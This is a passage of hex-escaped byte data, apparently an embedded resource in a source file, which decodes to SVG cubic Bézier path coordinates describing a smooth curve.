\x34\x37\x37\x37\x30\x38\x36\x20\x31\x35\x2e\x32\x31\x39\x30\x32\
\x38\x32\x37\x37\x33\x20\x43\x20\x37\x2e\x31\x31\x36\x38\x38\x38\
\x38\x33\x39\x37\x20\x31\x35\x2e\x32\x33\x31\x33\x32\x38\x34\x34\
\x31\x38\x20\x37\x2e\x31\x32\x33\x31\x32\x39\x39\x30\x38\x35\x34\
\x20\x31\x35\x2e\x32\x34\x32\x38\x33\x35\x36\x36\x34\x32\x20\x37\
\x2e\x31\x32\x39\x33\x37\x30\x39\x37\x37\x33\x37\x20\x31\x35\x2e\
\x32\x35\x33\x35\x34\x35\x38\x31\x39\x38\x20\x43\x20\x37\x2e\x31\
\x33\x35\x36\x31\x32\x30\x34\x36\x32\x31\x20\x31\x35\x2e\x32\x36\
\x34\x32\x35\x35\x39\x37\x35\x34\x20\x37\x2e\x31\x34\x31\x38\x35\
\x33\x31\x31\x35\x30\x34\x20\x31\x35\x2e\x32\x37\x34\x31\x36\x34\
\x32\x36\x38\x34\x20\x37\x2e\x31\x34\x38\x30\x39\x34\x31\x38\x33\
\x38\x38\x20\x31\x35\x2e\x32\x38\x33\x32\x36\x37\x38\x35\x39\x34\
\x20\x43\x20\x37\x2e\x31\x35\x34\x33\x33\x35\x32\x35\x32\x37\x32\
\x20\x31\x35\x2e\x32\x39\x32\x33\x37\x31\x34\x35\x30\x34\x20\x37\
\x2e\x31\x36\x30\x35\x37\x36\x33\x32\x31\x35\x35\x20\x31\x35\x2e\
\x33\x30\x30\x36\x36\x35\x34\x39\x37\x38\x20\x37\x2e\x31\x36\x36\
\x38\x31\x37\x33\x39\x30\x33\x39\x20\x31\x35\x2e\x33\x30\x38\x31\
\x34\x38\x34\x35\x32\x20\x43\x20\x37\x2e\x31\x37\x33\x30\x35\x38\
\x34\x35\x39\x32\x32\x20\x31\x35\x2e\x33\x31\x35\x36\x33\x31\x34\
\x30\x36\x33\x20\x37\x2e\x31\x37\x39\x32\x39\x39\x35\x32\x38\x30\
\x36\x20\x31\x35\x2e\x33\x32\x32\x32\x39\x38\x33\x38\x37\x33\x20\
\x37\x2e\x31\x38\x35\x35\x34\x30\x35\x39\x36\x39\x20\x31\x35\x2e\
\x33\x32\x38\x31\x34\x39\x31\x33\x37\x37\x20\x43\x20\x37\x2e\x31\
\x39\x31\x37\x38\x31\x36\x36\x35\x37\x33\x20\x31\x35\x2e\x33\x33\
\x33\x39\x39\x39\x38\x38\x38\x20\x37\x2e\x31\x39\x38\x30\x32\x32\
\x37\x33\x34\x35\x37\x20\x31\x35\x2e\x33\x33\x39\x30\x32\x39\x34\
\x39\x37\x20\x37\x2e\x32\x30\x34\x32\x36\x33\x38\x30\x33\x34\x20\
\x31\x35\x2e\x33\x34\x33\x32\x33\x38\x39\x39\x39\x35\x20\x43\x20\
\x37\x2e\x32\x31\x30\x35\x30\x34\x38\x37\x32\x32\x34\x20\x31\x35\
\x2e\x33\x34\x37\x34\x34\x38\x35\x30\x31\x39\x20\x37\x2e\x32\x31\
\x36\x37\x34\x35\x39\x34\x31\x30\x38\x20\x31\x35\x2e\x33\x35\x30\
\x38\x33\x32\x39\x36\x34\x20\x37\x2e\x32\x32\x32\x39\x38\x37\x30\
\x30\x39\x39\x31\x20\x31\x35\x2e\x33\x35\x33\x33\x39\x34\x37\x31\
\x31\x36\x20\x43\x20\x37\x2e\x32\x32\x39\x32\x32\x38\x30\x37\x38\
\x37\x35\x20\x31\x35\x2e\x33\x35\x35\x39\x35\x36\x34\x35\x39\x32\
\x20\x37\x2e\x32\x33\x35\x34\x36\x39\x31\x34\x37\x35\x38\x20\x31\
\x35\x2e\x33\x35\x37\x36\x39\x30\x35\x34\x32\x38\x20\x37\x2e\x32\
\x34\x31\x37\x31\x30\x32\x31\x36\x34\x32\x20\x31\x35\x2e\x33\x35\
\x38\x36\x30\x30\x35\x37\x35\x35\x20\x43\x20\x37\x2e\x32\x34\x37\
\x39\x35\x31\x32\x38\x35\x32\x36\x20\x31\x35\x2e\x33\x35\x39\x35\
\x31\x30\x36\x30\x38\x33\x20\x37\x2e\x32\x35\x34\x31\x39\x32\x33\
\x35\x34\x30\x39\x20\x31\x35\x2e\x33\x35\x39\x35\x39\x31\x36\x33\
\x32\x39\x20\x37\x2e\x32\x36\x30\x34\x33\x33\x34\x32\x32\x39\x33\
\x20\x31\x35\x2e\x33\x35\x38\x38\x34\x38\x35\x34\x34\x31\x20\x43\
\x20\x37\x2e\x32\x36\x36\x36\x37\x34\x34\x39\x31\x37\x36\x20\x31\
\x35\x2e\x33\x35\x38\x31\x30\x35\x34\x35\x35\x33\x20\x37\x2e\x32\
\x37\x32\x39\x31\x35\x35\x36\x30\x36\x20\x31\x35\x2e\x33\x35\x36\
\x35\x33\x33\x32\x39\x35\x36\x20\x37\x2e\x32\x37\x39\x31\x35\x36\
\x36\x32\x39\x34\x34\x20\x31\x35\x2e\x33\x35\x34\x31\x33\x38\x32\
\x33\x34\x20\x43\x20\x37\x2e\x32\x38\x35\x33\x39\x37\x36\x39\x38\
\x32\x37\x20\x31\x35\x2e\x33\x35\x31\x37\x34\x33\x31\x37\x32\x33\
\x20\x37\x2e\x32\x39\x31\x36\x33\x38\x37\x36\x37\x31\x31\x20\x31\
\x35\x2e\x33\x34\x38\x35\x32\x30\x32\x35\x38\x36\x20\x37\x2e\x32\
\x39\x37\x38\x37\x39\x38\x33\x35\x39\x34\x20\x31\x35\x2e\x33\x34\
\x34\x34\x37\x36\x39\x32\x36\x33\x20\x43\x20\x37\x2e\x33\x30\x34\
\x31\x32\x30\x39\x30\x34\x37\x38\x20\x31\x35\x2e\x33\x34\x30\x34\
\x33\x33\x35\x39\x34\x20\x37\x2e\x33\x31\x30\x33\x36\x31\x39\x37\
\x33\x36\x32\x20\x31\x35\x2e\x33\x33\x35\x35\x36\x34\x39\x30\x38\
\x32\x20\x37\x2e\x33\x31\x36\x36\x30\x33\x30\x34\x32\x34\x35\x20\
\x31\x35\x2e\x33\x32\x39\x38\x37\x39\x35\x35\x35\x34\x20\x43\x20\
\x37\x2e\x33\x32\x32\x38\x34\x34\x31\x31\x31\x32\x39\x20\x31\x35\
\x2e\x33\x32\x34\x31\x39\x34\x32\x30\x32\x37\x20\x37\x2e\x33\x32\
\x39\x30\x38\x35\x31\x38\x30\x31\x33\x20\x31\x35\x2e\x33\x31\x37\
\x36\x38\x37\x32\x37\x30\x37\x20\x37\x2e\x33\x33\x35\x33\x32\x36\
\x32\x34\x38\x39\x36\x20\x31\x35\x2e\x33\x31\x30\x33\x36\x38\x36\
\x38\x35\x38\x20\x43\x20\x37\x2e\x33\x34\x31\x35\x36\x37\x33\x31\
\x37\x38\x20\x31\x35\x2e\x33\x30\x33\x30\x35\x30\x31\x30\x31\x20\
\x37\x2e\x33\x34\x37\x38\x30\x38\x33\x38\x36\x36\x33\x20\x31\x35\
\x2e\x32\x39\x34\x39\x31\x34\x39\x38\x31\x32\x20\x37\x2e\x33\x35\
\x34\x30\x34\x39\x34\x35\x35\x34\x37\x20\x31\x35\x2e\x32\x38\x35\
\x39\x37\x34\x34\x37\x37\x32\x20\x43\x20\x37\x2e\x33\x36\x30\x32\
\x39\x30\x35\x32\x34\x33\x31\x20\x31\x35\x2e\x32\x37\x37\x30\x33\
\x33\x39\x37\x33\x32\x20\x37\x2e\x33\x36\x36\x35\x33\x31\x35\x39\
\x33\x31\x34\x20\x31\x35\x2e\x32\x36\x37\x32\x38\x33\x32\x34\x30\
\x38\x20\x37\x2e\x33\x37\x32\x37\x37\x32\x36\x36\x31\x39\x38\x20\
\x31\x35\x2e\x32\x35\x36\x37\x33\x34\x36\x33\x37\x38\x20\x43\x20\
\x37\x2e\x33\x37\x39\x30\x31\x33\x37\x33\x30\x38\x31\x20\x31\x35\
\x2e\x32\x34\x36\x31\x38\x36\x30\x33\x34\x38\x20\x37\x2e\x33\x38\
\x35\x32\x35\x34\x37\x39\x39\x36\x35\x20\x31\x35\x2e\x32\x33\x34\
\x38\x33\x34\x37\x36\x32\x33\x20\x37\x2e\x33\x39\x31\x34\x39\x35\
\x38\x36\x38\x34\x39\x20\x31\x35\x2e\x32\x32\x32\x36\x39\x34\x33\
\x36\x36\x33\x20\x43\x20\x37\x2e\x33\x39\x37\x37\x33\x36\x39\x33\
\x37\x33\x32\x20\x31\x35\x2e\x32\x31\x30\x35\x35\x33\x39\x37\x30\
\x32\x20\x37\x2e\x34\x30\x33\x39\x37\x38\x30\x30\x36\x31\x36\x20\
\x31\x35\x2e\x31\x39\x37\x36\x31\x39\x37\x30\x34\x34\x20\x37\x2e\
\x34\x31\x30\x32\x31\x39\x30\x37\x34\x39\x39\x20\x31\x35\x2e\x31\
\x38\x33\x39\x30\x36\x32\x38\x31\x37\x20\x43\x20\x37\x2e\x34\x31\
\x36\x34\x36\x30\x31\x34\x33\x38\x33\x20\x31\x35\x2e\x31\x37\x30\
\x31\x39\x32\x38\x35\x39\x31\x20\x37\x2e\x34\x32\x32\x37\x30\x31\
\x32\x31\x32\x36\x37\x20\x31\x35\x2e\x31\x35\x35\x36\x39\x35\x35\
\x39\x33\x35\x20\x37\x2e\x34\x32\x38\x39\x34\x32\x32\x38\x31\x35\
\x20\x31\x35\x2e\x31\x34\x30\x34\x33\x30\x33\x34\x32\x33\x20\x43\
\x20\x37\x2e\x34\x33\x35\x31\x38\x33\x33\x35\x30\x33\x34\x20\x31\
\x35\x2e\x31\x32\x35\x31\x36\x35\x30\x39\x31\x31\x20\x37\x2e\x34\
\x34\x31\x34\x32\x34\x34\x31\x39\x31\x37\x20\x31\x35\x2e\x31\x30\
\x39\x31\x32\x37\x32\x33\x35\x35\x20\x37\x2e\x34\x34\x37\x36\x36\
\x35\x34\x38\x38\x30\x31\x20\x31\x35\x2e\x30\x39\x32\x33\x33\x33\
\x37\x35\x32\x37\x20\x43\x20\x37\x2e\x34\x35\x33\x39\x30\x36\x35\
\x35\x36\x38\x35\x20\x31\x35\x2e\x30\x37\x35\x35\x34\x30\x32\x36\
\x39\x38\x20\x37\x2e\x34\x36\x30\x31\x34\x37\x36\x32\x35\x36\x38\
\x20\x31\x35\x2e\x30\x35\x37\x39\x38\x36\x36\x31\x35\x34\x20\x37\
\x2e\x34\x36\x36\x33\x38\x38\x36\x39\x34\x35\x32\x20\x31\x35\x2e\
\x30\x33\x39\x36\x39\x30\x38\x36\x20\x43\x20\x37\x2e\x34\x37\x32\
\x36\x32\x39\x37\x36\x33\x33\x35\x20\x31\x35\x2e\x30\x32\x31\x33\
\x39\x35\x31\x30\x34\x37\x20\x37\x2e\x34\x37\x38\x38\x37\x30\x38\
\x33\x32\x31\x39\x20\x31\x35\x2e\x30\x30\x32\x33\x35\x32\x37\x38\
\x35\x36\x20\x37\x2e\x34\x38\x35\x31\x31\x31\x39\x30\x31\x30\x33\
\x20\x31\x34\x2e\x39\x38\x32\x35\x38\x33\x30\x33\x39\x32\x20\x43\
\x20\x37\x2e\x34\x39\x31\x33\x35\x32\x39\x36\x39\x38\x36\x20\x31\
\x34\x2e\x39\x36\x32\x38\x31\x33\x32\x39\x32\x37\x20\x37\x2e\x34\
\x39\x37\x35\x39\x34\x30\x33\x38\x37\x20\x31\x34\x2e\x39\x34\x32\
\x33\x31\x31\x37\x34\x34\x34\x20\x37\x2e\x35\x30\x33\x38\x33\x35\
\x31\x30\x37\x35\x33\x20\x31\x34\x2e\x39\x32\x31\x30\x39\x38\x35\
\x36\x36\x37\x20\x43\x20\x37\x2e\x35\x31\x30\x30\x37\x36\x31\x37\
\x36\x33\x37\x20\x31\x34\x2e\x38\x39\x39\x38\x38\x35\x33\x38\x39\
\x20\x37\x2e\x35\x31\x36\x33\x31\x37\x32\x34\x35\x32\x31\x20\x31\
\x34\x2e\x38\x37\x37\x39\x35\x36\x33\x30\x32\x36\x20\x37\x2e\x35\
\x32\x32\x35\x35\x38\x33\x31\x34\x30\x34\x20\x31\x34\x2e\x38\x35\
\x35\x33\x33\x32\x34\x38\x34\x37\x20\x43\x20\x37\x2e\x35\x32\x38\
\x37\x39\x39\x33\x38\x32\x38\x38\x20\x31\x34\x2e\x38\x33\x32\x37\
\x30\x38\x36\x36\x36\x39\x20\x37\x2e\x35\x33\x35\x30\x34\x30\x34\
\x35\x31\x37\x31\x20\x31\x34\x2e\x38\x30\x39\x33\x38\x35\x39\x34\
\x20\x37\x2e\x35\x34\x31\x32\x38\x31\x35\x32\x30\x35\x35\x20\x31\
\x34\x2e\x37\x38\x35\x33\x38\x36\x34\x35\x33\x36\x20\x43\x20\x37\
\x2e\x35\x34\x37\x35\x32\x32\x35\x38\x39\x33\x39\x20\x31\x34\x2e\
\x37\x36\x31\x33\x38\x36\x39\x36\x37\x33\x20\x37\x2e\x35\x35\x33\
\x37\x36\x33\x36\x35\x38\x32\x32\x20\x31\x34\x2e\x37\x33\x36\x37\
\x30\x36\x36\x35\x32\x20\x37\x2e\x35\x36\x30\x30\x30\x34\x37\x32\
\x37\x30\x36\x20\x31\x34\x2e\x37\x31\x31\x33\x36\x38\x35\x39\x35\
\x33\x20\x43\x20\x37\x2e\x35\x36\x36\x32\x34\x35\x37\x39\x35\x38\
\x39\x20\x31\x34\x2e\x36\x38\x36\x30\x33\x30\x35\x33\x38\x36\x20\
\x37\x2e\x35\x37\x32\x34\x38\x36\x38\x36\x34\x37\x33\x20\x31\x34\
\x2e\x36\x36\x30\x30\x33\x30\x37\x38\x35\x36\x20\x37\x2e\x35\x37\
\x38\x37\x32\x37\x39\x33\x33\x35\x37\x20\x31\x34\x2e\x36\x33\x33\
\x33\x39\x33\x33\x32\x35\x38\x20\x43\x20\x37\x2e\x35\x38\x34\x39\
\x36\x39\x30\x30\x32\x34\x20\x31\x34\x2e\x36\x30\x36\x37\x35\x35\
\x38\x36\x36\x20\x37\x2e\x35\x39\x31\x32\x31\x30\x30\x37\x31\x32\
\x34\x20\x31\x34\x2e\x35\x37\x39\x34\x37\x36\x38\x36\x35\x32\x20\
\x37\x2e\x35\x39\x37\x34\x35\x31\x31\x34\x30\x30\x38\x20\x31\x34\
\x2e\x35\x35\x31\x35\x38\x31\x31\x37\x38\x33\x20\x43\x20\x37\x2e\
\x36\x30\x33\x36\x39\x32\x32\x30\x38\x39\x31\x20\x31\x34\x2e\x35\
\x32\x33\x36\x38\x35\x34\x39\x31\x33\x20\x37\x2e\x36\x30\x39\x39\
\x33\x33\x32\x37\x37\x37\x35\x20\x31\x34\x2e\x34\x39\x35\x31\x36\
\x39\x34\x31\x30\x35\x20\x37\x2e\x36\x31\x36\x31\x37\x34\x33\x34\
\x36\x35\x38\x20\x31\x34\x2e\x34\x36\x36\x30\x35\x38\x36\x31\x37\
\x32\x20\x43\x20\x37\x2e\x36\x32\x32\x34\x31\x35\x34\x31\x35\x34\
\x32\x20\x31\x34\x2e\x34\x33\x36\x39\x34\x37\x38\x32\x33\x39\x20\
\x37\x2e\x36\x32\x38\x36\x35\x36\x34\x38\x34\x32\x36\x20\x31\x34\
\x2e\x34\x30\x37\x32\x33\x38\x37\x34\x32\x38\x20\x37\x2e\x36\x33\
\x34\x38\x39\x37\x35\x35\x33\x30\x39\x20\x31\x34\x2e\x33\x37\x36\
\x39\x35\x37\x38\x34\x32\x33\x20\x43\x20\x37\x2e\x36\x34\x31\x31\
\x33\x38\x36\x32\x31\x39\x33\x20\x31\x34\x2e\x33\x34\x36\x36\x37\
\x36\x39\x34\x31\x39\x20\x37\x2e\x36\x34\x37\x33\x37\x39\x36\x39\
\x30\x37\x36\x20\x31\x34\x2e\x33\x31\x35\x38\x32\x30\x37\x38\x34\
\x34\x20\x37\x2e\x36\x35\x33\x36\x32\x30\x37\x35\x39\x36\x20\x31\
\x34\x2e\x32\x38\x34\x34\x31\x36\x35\x38\x34\x37\x20\x43\x20\x37\
\x2e\x36\x35\x39\x38\x36\x31\x38\x32\x38\x34\x34\x20\x31\x34\x2e\
\x32\x35\x33\x30\x31\x32\x33\x38\x35\x20\x37\x2e\x36\x36\x36\x31\
\x30\x32\x38\x39\x37\x32\x37\x20\x31\x34\x2e\x32\x32\x31\x30\x35\
\x36\x38\x34\x38\x34\x20\x37\x2e\x36\x37\x32\x33\x34\x33\x39\x36\
\x36\x31\x31\x20\x31\x34\x2e\x31\x38\x38\x35\x37\x37\x38\x39\x33\
\x36\x20\x43\x20\x37\x2e\x36\x37\x38\x35\x38\x35\x30\x33\x34\x39\
\x34\x20\x31\x34\x2e\x31\x35\x36\x30\x39\x38\x39\x33\x38\x38\x20\
\x37\x2e\x36\x38\x34\x38\x32\x36\x31\x30\x33\x37\x38\x20\x31\x34\
\x2e\x31\x32\x33\x30\x39\x33\x34\x31\x39\x36\x20\x37\x2e\x36\x39\
\x31\x30\x36\x37\x31\x37\x32\x36\x32\x20\x31\x34\x2e\x30\x38\x39\
\x35\x38\x39\x39\x31\x35\x34\x20\x43\x20\x37\x2e\x36\x39\x37\x33\
\x30\x38\x32\x34\x31\x34\x35\x20\x31\x34\x2e\x30\x35\x36\x30\x38\
\x36\x34\x31\x31\x32\x20\x37\x2e\x37\x30\x33\x35\x34\x39\x33\x31\
\x30\x32\x39\x20\x31\x34\x2e\x30\x32\x32\x30\x38\x31\x39\x32\x38\
\x38\x20\x37\x2e\x37\x30\x39\x37\x39\x30\x33\x37\x39\x31\x32\x20\
\x31\x33\x2e\x39\x38\x37\x36\x30\x35\x36\x36\x34\x36\x20\x43\x20\
\x37\x2e\x37\x31\x36\x30\x33\x31\x34\x34\x37\x39\x36\x20\x31\x33\
\x2e\x39\x35\x33\x31\x32\x39\x34\x30\x30\x34\x20\x37\x2e\x37\x32\
\x32\x32\x37\x32\x35\x31\x36\x38\x20\x31\x33\x2e\x39\x31\x38\x31\
\x37\x38\x35\x31\x38\x37\x20\x37\x2e\x37\x32\x38\x35\x31\x33\x35\
\x38\x35\x36\x33\x20\x31\x33\x2e\x38\x38\x32\x37\x38\x32\x37\x38\
\x37\x34\x20\x43\x20\x37\x2e\x37\x33\x34\x37\x35\x34\x36\x35\x34\
\x34\x37\x20\x31\x33\x2e\x38\x34\x37\x33\x38\x37\x30\x35\x36\x32\
\x20\x37\x2e\x37\x34\x30\x39\x39\x35\x37\x32\x33\x33\x20\x31\x33\
\x2e\x38\x31\x31\x35\x34\x33\x38\x30\x31\x38\x20\x37\x2e\x37\x34\
\x37\x32\x33\x36\x37\x39\x32\x31\x34\x20\x31\x33\x2e\x37\x37\x35\
\x32\x38\x33\x33\x31\x37\x39\x20\x43\x20\x37\x2e\x37\x35\x33\x34\
\x37\x37\x38\x36\x30\x39\x38\x20\x31\x33\x2e\x37\x33\x39\x30\x32\
\x32\x38\x33\x33\x39\x20\x37\x2e\x37\x35\x39\x37\x31\x38\x39\x32\
\x39\x38\x31\x20\x31\x33\x2e\x37\x30\x32\x33\x34\x32\x36\x31\x33\
\x31\x20\x37\x2e\x37\x36\x35\x39\x35\x39\x39\x39\x38\x36\x35\x20\
\x31\x33\x2e\x36\x36\x35\x32\x37\x33\x34\x32\x37\x35\x20\x43\x20\
\x37\x2e\x37\x37\x32\x32\x30\x31\x30\x36\x37\x34\x38\x20\x31\x33\
\x2e\x36\x32\x38\x32\x30\x34\x32\x34\x31\x39\x20\x37\x2e\x37\x37\
\x38\x34\x34\x32\x31\x33\x36\x33\x32\x20\x31\x33\x2e\x35\x39\x30\
\x37\x34\x33\x37\x35\x34\x34\x20\x37\x2e\x37\x38\x34\x36\x38\x33\
\x32\x30\x35\x31\x36\x20\x31\x33\x2e\x35\x35\x32\x39\x32\x33\x31\
\x36\x38\x33\x20\x43\x20\x37\x2e\x37\x39\x30\x39\x32\x34\x32\x37\
\x33\x39\x39\x20\x31\x33\x2e\x35\x31\x35\x31\x30\x32\x35\x38\x32\
\x33\x20\x37\x2e\x37\x39\x37\x31\x36\x35\x33\x34\x32\x38\x33\x20\
\x31\x33\x2e\x34\x37\x36\x39\x31\x39\x37\x33\x34\x31\x20\x37\x2e\
\x38\x30\x33\x34\x30\x36\x34\x31\x31\x36\x36\x20\x31\x33\x2e\x34\
\x33\x38\x34\x30\x36\x32\x31\x30\x32\x20\x43\x20\x37\x2e\x38\x30\
\x39\x36\x34\x37\x34\x38\x30\x35\x20\x31\x33\x2e\x33\x39\x39\x38\
\x39\x32\x36\x38\x36\x33\x20\x37\x2e\x38\x31\x35\x38\x38\x38\x35\
\x34\x39\x33\x34\x20\x31\x33\x2e\x33\x36\x31\x30\x34\x36\x35\x30\
\x30\x32\x20\x37\x2e\x38\x32\x32\x31\x32\x39\x36\x31\x38\x31\x37\
\x20\x31\x33\x2e\x33\x32\x31\x38\x39\x39\x35\x37\x32\x32\x20\x43\
\x20\x37\x2e\x38\x32\x38\x33\x37\x30\x36\x38\x37\x30\x31\x20\x31\
\x33\x2e\x32\x38\x32\x37\x35\x32\x36\x34\x34\x32\x20\x37\x2e\x38\
\x33\x34\x36\x31\x31\x37\x35\x35\x38\x34\x20\x31\x33\x2e\x32\x34\
\x33\x33\x30\x33\x31\x36\x38\x31\x20\x37\x2e\x38\x34\x30\x38\x35\
\x32\x38\x32\x34\x36\x38\x20\x31\x33\x2e\x32\x30\x33\x35\x38\x33\
\x33\x34\x39\x20\x43\x20\x37\x2e\x38\x34\x37\x30\x39\x33\x38\x39\
\x33\x35\x32\x20\x31\x33\x2e\x31\x36\x33\x38\x36\x33\x35\x32\x39\
\x38\x20\x37\x2e\x38\x35\x33\x33\x33\x34\x39\x36\x32\x33\x35\x20\
\x31\x33\x2e\x31\x32\x33\x38\x37\x31\x37\x34\x34\x33\x20\x37\x2e\
\x38\x35\x39\x35\x37\x36\x30\x33\x31\x31\x39\x20\x31\x33\x2e\x30\
\x38\x33\x36\x34\x30\x34\x33\x32\x35\x20\x43\x20\x37\x2e\x38\x36\
\x35\x38\x31\x37\x31\x30\x30\x30\x32\x20\x31\x33\x2e\x30\x34\x33\
\x34\x30\x39\x31\x32\x30\x36\x20\x37\x2e\x38\x37\x32\x30\x35\x38\
\x31\x36\x38\x38\x36\x20\x31\x33\x2e\x30\x30\x32\x39\x33\x36\x38\
\x34\x34\x35\x20\x37\x2e\x38\x37\x38\x32\x39\x39\x32\x33\x37\x37\
\x20\x31\x32\x2e\x39\x36\x32\x32\x35\x36\x32\x32\x39\x31\x20\x43\
\x20\x37\x2e\x38\x38\x34\x35\x34\x30\x33\x30\x36\x35\x33\x20\x31\
\x32\x2e\x39\x32\x31\x35\x37\x35\x36\x31\x33\x37\x20\x37\x2e\x38\
\x39\x30\x37\x38\x31\x33\x37\x35\x33\x37\x20\x31\x32\x2e\x38\x38\
\x30\x36\x38\x35\x34\x30\x38\x37\x20\x37\x2e\x38\x39\x37\x30\x32\
\x32\x34\x34\x34\x32\x31\x20\x31\x32\x2e\x38\x33\x39\x36\x31\x38\
\x33\x37\x33\x33\x20\x43\x20\x37\x2e\x39\x30\x33\x32\x36\x33\x35\
\x31\x33\x30\x34\x20\x31\x32\x2e\x37\x39\x38\x35\x35\x31\x33\x33\
\x38\x20\x37\x2e\x39\x30\x39\x35\x30\x34\x35\x38\x31\x38\x38\x20\
\x31\x32\x2e\x37\x35\x37\x33\x30\x36\x34\x31\x31\x36\x20\x37\x2e\
\x39\x31\x35\x37\x34\x35\x36\x35\x30\x37\x31\x20\x31\x32\x2e\x37\
\x31\x35\x39\x31\x36\x34\x33\x37\x34\x20\x43\x20\x37\x2e\x39\x32\
\x31\x39\x38\x36\x37\x31\x39\x35\x35\x20\x31\x32\x2e\x36\x37\x34\
\x35\x32\x36\x34\x36\x33\x31\x20\x37\x2e\x39\x32\x38\x32\x32\x37\
\x37\x38\x38\x33\x39\x20\x31\x32\x2e\x36\x33\x32\x39\x39\x30\x35\
\x37\x31\x33\x20\x37\x2e\x39\x33\x34\x34\x36\x38\x38\x35\x37\x32\
\x32\x20\x31\x32\x2e\x35\x39\x31\x33\x34\x31\x36\x33\x38\x33\x20\
\x43\x20\x37\x2e\x39\x34\x30\x37\x30\x39\x39\x32\x36\x30\x36\x20\
\x31\x32\x2e\x35\x34\x39\x36\x39\x32\x37\x30\x35\x32\x20\x37\x2e\
\x39\x34\x36\x39\x35\x30\x39\x39\x34\x38\x39\x20\x31\x32\x2e\x35\
\x30\x37\x39\x33\x30\x30\x35\x33\x38\x20\x37\x2e\x39\x35\x33\x31\
\x39\x32\x30\x36\x33\x37\x33\x20\x31\x32\x2e\x34\x36\x36\x30\x38\
\x36\x35\x34\x32\x34\x20\x43\x20\x37\x2e\x39\x35\x39\x34\x33\x33\
\x31\x33\x32\x35\x37\x20\x31\x32\x2e\x34\x32\x34\x32\x34\x33\x30\
\x33\x31\x31\x20\x37\x2e\x39\x36\x35\x36\x37\x34\x32\x30\x31\x34\
\x20\x31\x32\x2e\x33\x38\x32\x33\x31\x38\x31\x37\x36\x33\x20\x37\
\x2e\x39\x37\x31\x39\x31\x35\x32\x37\x30\x32\x34\x20\x31\x32\x2e\
\x33\x34\x30\x33\x34\x34\x37\x36\x37\x39\x20\x43\x20\x37\x2e\x39\
\x37\x38\x31\x35\x36\x33\x33\x39\x30\x37\x20\x31\x32\x2e\x32\x39\
\x38\x33\x37\x31\x33\x35\x39\x34\x20\x37\x2e\x39\x38\x34\x33\x39\
\x37\x34\x30\x37\x39\x31\x20\x31\x32\x2e\x32\x35\x36\x33\x34\x39\
\x31\x30\x38\x32\x20\x37\x2e\x39\x39\x30\x36\x33\x38\x34\x37\x36\
\x37\x35\x20\x31\x32\x2e\x32\x31\x34\x33\x31\x30\x36\x38\x34\x38\
\x20\x43\x20\x37\x2e\x39\x39\x36\x38\x37\x39\x35\x34\x35\x35\x38\
\x20\x31\x32\x2e\x31\x37\x32\x32\x37\x32\x32\x36\x31\x33\x20\x38\
\x2e\x30\x30\x33\x31\x32\x30\x36\x31\x34\x34\x32\x20\x31\x32\x2e\
\x31\x33\x30\x32\x31\x37\x35\x37\x31\x32\x20\x38\x2e\x30\x30\x39\
\x33\x36\x31\x36\x38\x33\x32\x35\x20\x31\x32\x2e\x30\x38\x38\x31\
\x37\x39\x31\x31\x35\x32\x20\x43\x20\x38\x2e\x30\x31\x35\x36\x30\
\x32\x37\x35\x32\x30\x39\x20\x31\x32\x2e\x30\x34\x36\x31\x34\x30\
\x36\x35\x39\x33\x20\x38\x2e\x30\x32\x31\x38\x34\x33\x38\x32\x30\
\x39\x33\x20\x31\x32\x2e\x30\x30\x34\x31\x31\x38\x35\x33\x38\x31\
\x20\x38\x2e\x30\x32\x38\x30\x38\x34\x38\x38\x39\x37\x36\x20\x31\
\x31\x2e\x39\x36\x32\x31\x34\x35\x30\x33\x32\x31\x20\x43\x20\x38\
\x2e\x30\x33\x34\x33\x32\x35\x39\x35\x38\x36\x20\x31\x31\x2e\x39\
\x32\x30\x31\x37\x31\x35\x32\x36\x32\x20\x38\x2e\x30\x34\x30\x35\
\x36\x37\x30\x32\x37\x34\x33\x20\x31\x31\x2e\x38\x37\x38\x32\x34\
\x36\x39\x33\x31\x32\x20\x38\x2e\x30\x34\x36\x38\x30\x38\x30\x39\
\x36\x32\x37\x20\x31\x31\x2e\x38\x33\x36\x34\x30\x33\x32\x35\x37\
\x36\x20\x43\x20\x38\x2e\x30\x35\x33\x30\x34\x39\x31\x36\x35\x31\
\x31\x20\x31\x31\x2e\x37\x39\x34\x35\x35\x39\x35\x38\x33\x39\x20\
\x38\x2e\x30\x35\x39\x32\x39\x30\x32\x33\x33\x39\x34\x20\x31\x31\
\x2e\x37\x35\x32\x37\x39\x37\x33\x32\x31\x36\x20\x38\x2e\x30\x36\
\x35\x35\x33\x31\x33\x30\x32\x37\x38\x20\x31\x31\x2e\x37\x31\x31\
\x31\x34\x38\x31\x36\x31\x37\x20\x43\x20\x38\x2e\x30\x37\x31\x37\
\x37\x32\x33\x37\x31\x36\x31\x20\x31\x31\x2e\x36\x36\x39\x34\x39\
\x39\x30\x30\x31\x39\x20\x38\x2e\x30\x37\x38\x30\x31\x33\x34\x34\
\x30\x34\x35\x20\x31\x31\x2e\x36\x32\x37\x39\x36\x33\x36\x32\x37\
\x39\x20\x38\x2e\x30\x38\x34\x32\x35\x34\x35\x30\x39\x32\x39\x20\
\x31\x31\x2e\x35\x38\x36\x35\x37\x33\x33\x36\x32\x36\x20\x43\x20\
\x38\x2e\x30\x39\x30\x34\x39\x35\x35\x37\x38\x31\x32\x20\x31\x31\
\x2e\x35\x34\x35\x31\x38\x33\x30\x39\x37\x34\x20\x38\x2e\x30\x39\
\x36\x37\x33\x36\x36\x34\x36\x39\x36\x20\x31\x31\x2e\x35\x30\x33\
\x39\x33\x38\x38\x31\x36\x37\x20\x38\x2e\x31\x30\x32\x39\x37\x37\
\x37\x31\x35\x37\x39\x20\x31\x31\x2e\x34\x36\x32\x38\x37\x31\x34\
\x32\x36\x37\x20\x43\x20\x38\x2e\x31\x30\x39\x32\x31\x38\x37\x38\
\x34\x36\x33\x20\x31\x31\x2e\x34\x32\x31\x38\x30\x34\x30\x33\x36\
\x36\x20\x38\x2e\x31\x31\x35\x34\x35\x39\x38\x35\x33\x34\x37\x20\
\x31\x31\x2e\x33\x38\x30\x39\x31\x34\x36\x30\x34\x32\x20\x38\x2e\
\x31\x32\x31\x37\x30\x30\x39\x32\x32\x33\x20\x31\x31\x2e\x33\x34\
\x30\x32\x33\x33\x35\x37\x30\x39\x20\x43\x20\x38\x2e\x31\x32\x37\
\x39\x34\x31\x39\x39\x31\x31\x34\x20\x31\x31\x2e\x32\x39\x39\x35\
\x35\x32\x35\x33\x37\x35\x20\x38\x2e\x31\x33\x34\x31\x38\x33\x30\
\x35\x39\x39\x38\x20\x31\x31\x2e\x32\x35\x39\x30\x38\x31\x31\x35\
